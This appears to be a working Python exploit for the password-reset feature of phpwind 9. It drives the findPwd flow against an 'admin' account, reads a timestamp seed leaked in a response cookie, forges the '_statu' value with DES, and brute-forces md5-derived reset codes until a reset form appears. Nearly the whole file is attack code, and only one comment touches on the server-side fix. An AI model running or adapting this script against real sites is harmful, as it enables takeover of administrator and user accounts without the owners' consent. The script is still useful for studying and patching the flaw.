def des_encrypt(s, key):
    """Encrypt *s* with DES-CBC and return the ciphertext base64-encoded.

    The DES key is the first 8 bytes of *key*; the IV is the last 8
    characters of ``md5(key)`` (``md5`` is a helper defined elsewhere in
    this file), so the IV is fully determined by the key and carries no
    per-message randomness. Presumably this mirrors the token construction
    of the application under test — confirm against its source.

    :param s: plaintext string
    :param key: key material; only its first 8 bytes are used as the DES key
    :return: base64-encoded ciphertext, as bytes
    """
    block_size = 8
    # IV is derived from the *untruncated* key, the DES key from its prefix.
    init_vector = md5(key)[-block_size:]
    des_key = key[:block_size]
    cipher = des(des_key, CBC, init_vector, pad=None, padmode=PAD_PKCS5)
    ciphertext = cipher.encrypt(s, padmode=PAD_PKCS5)
    return base64.b64encode(ciphertext)
def request(url, username, email):
    """Drive the three-step findPwd flow and return the reset-token seed.

    Steps: fetch the findPwd page to harvest a CSRF token, confirm the
    username, then submit the e-mail form. On success the function returns,
    as an int, the ``lMd_lastvisit`` value read back from the response
    headers (URL-encoded; ``%09`` is a tab) — the caller feeds that value to
    ``md5()`` to derive candidate reset codes. Returns False when the server
    reports a username/e-mail mismatch and None (implicitly) for any other
    response. A missing CSRF token or header value raises IndexError, as in
    the original.

    :param url: site base URL; '/index.php?...' paths are appended to it
    :param username: account name
    :param email: e-mail address registered for the account
    """
    token_pattern = r'(?<=csrf_token" value=")\w+'
    find_pwd = url + '/index.php?m=u&c=findPwd'

    # Step 1: initial page and its CSRF token.
    page = r.get(find_pwd)
    token = re.findall(token_pattern, page.text)[0]
    print(token)

    # Step 2: username check; the response carries a fresh token.
    page = r.post(
        find_pwd + '&a=checkUsername',
        headers={'Cookie': 'csrf_token=' + token + ';'},
        data={'step': 'do', 'username': username, 'csrf_token': token},
    )
    token = re.findall(token_pattern, page.text)[0]

    # Step 3: the e-mail form.
    page = r.post(
        find_pwd + '&a=dobymail',
        headers={'Cookie': 'csrf_token=' + token + ';'},
        data={'username': username, 'email': email, 'csrf_token': token},
    )

    body = page.text
    if "我们已经发送邮件至您的邮箱" in body:
        print('重置连接发送成功')
        # The seed the later reset code is built from is exposed in a
        # response header (cookie value), not in the e-mail alone.
        seed = re.findall(
            r'(?<=lMd_lastvisit=0%09).*(?=%09%2Fphpwind)', str(page.headers)
        )[0]
        return int(seed)
    if "邮箱和用户名不匹配" in body:
        print('邮箱和用户名不匹配')
        return False
if __name__ == '__main__':
    # The reset link's `code` is an 8-character window of md5(seed), where
    # the seed is a timestamp the findPwd response hands back (see
    # request()); only eight windows are tried. Mitigation on the server
    # side: derive reset tokens from a CSPRNG (e.g. secrets.token_urlsafe),
    # never from a value the client can observe, and expire them quickly.
    base_url = "http://10.10.10.134:8080/phpwind9/"
    username = 'admin'
    email = 'xxxx@qq.com'
    site_hash = 'TbJlLkai'

    timestamp = request(url=base_url, username=username, email=email)

    # `_statu` is DES(username|email|<address>) under site_hash + '___findpwd'.
    # The literal 'email' looks like the token's type field rather than the
    # address — confirm against the application source.
    verification = des_encrypt(
        s=username + "|" + 'email' + "|" + email,
        key=site_hash + '___findpwd',
    ).decode('utf-8')

    # Double URL-encode every non-alphanumeric base64 character; quote()
    # leaves '/' untouched by default, so only '+' and '=' actually change.
    plain_chars = string.ascii_letters + string.digits
    for ch in verification:
        if ch not in plain_chars:
            encoded = quote(quote(ch, encoding='utf-8'), encoding='utf-8')
            verification = verification.replace(ch, encoded)

    print(verification)
    print(timestamp)
    print(md5(str(timestamp)))

    if timestamp:
        digest = md5(str(timestamp))
        for offset in range(8):
            code = digest[offset + 1:offset + 9]
            reset_url = base_url + (
                'index.php?m=u&c=findPwd&a=resetpwd&code={0}&_statu={1}'
                .format(code, verification)
            )
            page = r.get(reset_url)
            # '新密码' ("new password") in the body means the reset form rendered.
            if '新密码' in page.text:
                print(reset_url)